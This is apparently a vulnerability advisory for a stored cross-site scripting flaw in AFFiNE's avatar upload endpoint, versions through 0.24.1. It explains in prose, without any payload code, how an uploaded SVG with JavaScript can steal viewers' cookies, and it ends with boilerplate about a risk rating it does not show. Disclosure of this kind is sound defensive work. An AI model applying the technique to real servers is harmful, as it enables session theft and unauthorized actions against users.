toeverything AFFiNE Cross-Site Scripting Vulnerability in Avatar Upload Endpoint
Vulnerability
A stored cross-site scripting vulnerability has been identified in toeverything AFFiNE versions through 0.24.1. The issue arises in the Avatar Upload Image endpoint, where an attacker can upload a malicious SVG file containing obfuscated JavaScript. This file is permanently stored on the server and executed in the browser of any user who views the image. This vulnerability allows for the theft of cookies from affected users, which can be redirected to an arbitrary endpoint.
Impact
Exploitation of this vulnerability allows for stored cross-site scripting, where uploaded images containing malicious scripts are executed in the browsers of users who view them. This could lead to cookie theft and unauthorized actions on behalf of the user.
Reproduction
To reproduce this vulnerability, upload an SVG file containing JavaScript payloads to the Avatar Upload Image endpoint. Once the file is uploaded, it will be executed in the context of the user viewing the image.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.